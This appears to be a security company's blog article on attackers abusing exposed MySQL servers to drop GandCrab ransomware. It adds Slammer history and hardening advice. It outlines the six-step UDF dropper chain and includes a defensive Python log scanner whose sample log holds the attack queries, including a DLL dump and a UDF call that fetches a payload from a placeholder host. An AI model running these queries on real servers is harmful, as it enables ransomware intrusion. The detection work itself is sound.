Cybercriminals Target Another Legitimate Tool: MySQL Servers

The recent discovery by researchers at Sophos that attackers are scanning the internet for vulnerable MySQL servers in order to infect them with the GandCrab ransomware shows that attackers are increasingly targeting legitimate tools as a way to sneak into organizations’ networks.

MySQL server is a database platform that uses tables to store data and indexes to sort data and speed up performance. It supports desktop and web applications and runs on either Linux or Windows. GandCrab ransomware, meanwhile, is a particular type of malicious software (malware) designed to lock legitimate users out of their computer system or data until a ransom is paid.

Researchers at Sophos said that they set up a deliberately insecure mock MySQL server for malicious hackers to find, probe and connect to. Sure enough, the researchers said, a malicious actor or actors connected to TCP port 3306, the default port for MySQL, and performed remote code execution on this exposed MySQL server. Remote code execution refers to the ability of an attacker to run code of their choosing on someone else’s computing device, and so make changes to it, no matter where that device is geographically located.

Researchers at Sophos said attackers turned exposed MySQL servers into remote code execution robots through the following process:

  1. Connect to a MySQL server directly accessible from the internet;
  2. Guess the username and password of an authorized user of the MySQL server and log in;
  3. Create an innocent-looking database table and add a text record whose contents are in reality a Windows executable file encoded in hexadecimal;
  4. Decode the hexadecimal data and save it as a local file called “cna12.dll” (a DLL is a library that contains data and code that can be used by more than one program at the same time);
  5. Instruct the server to load the new DLL as a MySQL plugin known as a User Defined Function (UDF); and
  6. Call a function in the new plugin to retrieve and run the GandCrab ransomware using HTTP.
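For defenders, the six steps above leave a recognisable trail in the MySQL general query log. The following is an added example, not code from Sophos or this article, that scans constructed log lines for the chain: a hex literal beginning with the Windows executable header, a blob written out as a DLL, a CREATE FUNCTION ... SONAME load, and a call to the new function with a URL. The log format assumed is MySQL's general query log; the table name, function name and file paths are constructed, and only the file name cna12.dll comes from the article.

```python
import re
from collections import defaultdict

# Constructed MySQL general query log sample: connection 12 follows the chain, 13 is benign.
SAMPLE_LOG = """\
2019-05-20T10:15:31Z\t   12 Connect\tadmin@203.0.113.5 on  using TCP/IP
2019-05-20T10:15:32Z\t   12 Query\tCREATE TABLE notes (data LONGBLOB)
2019-05-20T10:15:33Z\t   12 Query\tINSERT INTO notes VALUES (0x4D5A90000300000004000000FFFF0000)
2019-05-20T10:15:34Z\t   12 Query\tSELECT data FROM notes INTO DUMPFILE 'C:/mysql/lib/plugin/cna12.dll'
2019-05-20T10:15:35Z\t   12 Query\tCREATE FUNCTION stage2 RETURNS STRING SONAME 'cna12.dll'
2019-05-20T10:15:36Z\t   12 Query\tSELECT stage2('http://example.invalid/x', 'C:/Windows/Temp/x.exe')
2019-05-20T10:15:40Z\t   13 Connect\tapp@10.0.0.7 on shop using TCP/IP
2019-05-20T10:15:41Z\t   13 Query\tSELECT id, name FROM products WHERE id = 42
"""

# General log layout: <timestamp> TAB <padded connection id> SPACE <command> TAB <argument>
LINE_RE = re.compile(r"^(\S+)\t\s*(\d+) (\w+)\t(.*)$")

# One regex per stage of the chain, matched against the query text.
STAGES = [
    ("hex_pe_insert", re.compile(r"\bINSERT\b.*\b0x4D5A", re.I)),          # "MZ" header in a hex literal
    ("dumpfile_dll", re.compile(r"INTO\s+DUMPFILE\s+'[^']*\.dll'", re.I)),  # blob written out as a DLL
    ("udf_create", re.compile(r"CREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),   # DLL loaded as a UDF plugin
    ("udf_http_call", re.compile(r"\bSELECT\s+\w+\s*\(.*https?://", re.I)), # UDF called with a URL argument
]

def parse_line(line):
    """Split one general-log line into its fields; return None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, conn_id, cmd, arg = m.groups()
    return {"ts": ts, "conn": int(conn_id), "cmd": cmd, "arg": arg}

def scan_log(text):
    """Map each connection id to the chain stages its queries matched, in log order."""
    hits = defaultdict(list)
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["cmd"] != "Query":
            continue
        for name, pattern in STAGES:
            if pattern.search(rec["arg"]) and name not in hits[rec["conn"]]:
                hits[rec["conn"]].append(name)
    return dict(hits)

def verdict(stages, threshold=3):
    """Flag a connection once it has hit at least `threshold` of the four stages."""
    return "udf-dropper-chain" if len(stages) >= threshold else "benign"
```

Grouping by connection id rather than alerting on single statements keeps legitimate one-off uses of INTO DUMPFILE or CREATE FUNCTION from firing on their own.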

The researchers, however, noted that the observed attack wasn’t particularly sophisticated, because the attackers failed to determine whether the mock MySQL server that the researchers set up was running Linux or Windows. The MySQL server attack observed by Sophos researchers only infects the Windows version of MySQL.

As the mock insecure MySQL server set up by Sophos researchers was running on Linux, it wasn’t infected by the GandCrab ransomware. Had the server been running Windows, the GandCrab ransomware would have been unleashed.

Past Vulnerabilities

SQL servers have been targeted by attackers before. On January 25, 2003, the malware called “Slammer”, also known as Helkern, Sapphire and Warhol, wreaked havoc worldwide, causing internet blackouts in countries such as South Korea and the U.S. South Korea, one of the most interconnected countries in the world even at that time, suffered an internet outage, while banking operations at one U.S. bank were disrupted as its ATMs were temporarily knocked offline.

SQL, which stands for structured query language, is a computer language used to communicate with a database. There are several database platforms that use SQL. Two of the most popular database platforms are Microsoft SQL server and MySQL server.

As the name suggests, Microsoft SQL server is a database platform developed by Microsoft and runs only on Windows operating systems. The first release of Microsoft SQL server was in 1989. MySQL server, on the other hand, is an open-source database platform that was first released in 1995. Unlike Microsoft SQL server, which runs only on Windows, MySQL server runs on either Linux or Windows.

Like the latest attack discovered by Sophos researchers, the Slammer malware that wreaked havoc on January 25, 2003 scanned the internet for vulnerable machines. Where the attack discovered by Sophos researchers scanned the internet for vulnerable MySQL servers, the Slammer malware scanned for vulnerable Microsoft SQL servers, specifically version 2000.

In the Slammer case, a “vulnerable” Microsoft SQL Server 2000 was one that had not applied the security update fixing the vulnerability Slammer exploited, an update Microsoft had released months before the January 25, 2003 attack.

Slammer made a huge impact worldwide at the time due to its worm capability – the ability to spread itself within networks without user interaction. The Slammer worm spread itself to random IP addresses via Microsoft SQL port 1434.

Slammer spread 255 times faster than any other worm at the time of the attack. It caused internet blackouts on a worldwide scale because Microsoft SQL servers were then widely used on the web, and once a Microsoft SQL server was infected with the Slammer worm it tried to connect to other random Microsoft SQL servers in an endless loop, causing a global internet traffic overflow.

Cybersecurity Best Practices

Exploiting vulnerabilities in SQL servers is another attempt by cybercriminals to abuse the legitimate tools of system administrators to sneak into organizations’ networks. Here are some cybersecurity best practices to prevent or mitigate this type of cyberattack:

Keep all software up-to-date

In the case of Slammer, the attack could have been prevented by timely application of the Microsoft SQL Server 2000 security update.

Ensure that SQL Servers Aren’t Accessible from the Internet

It’s recommended that SQL servers not be directly accessible from the internet. System administrators may, however, find it necessary to make a server reachable online. In that case, internet-facing SQL servers should be reached only through a VPN as the first point of entry, and two-factor authentication (2FA) should be required for all users.

When you need help securing your infrastructure, our information security experts are a phone call away. To learn more about how we can help, or for immediate assistance, call today at (416) 920-3000 or email us.
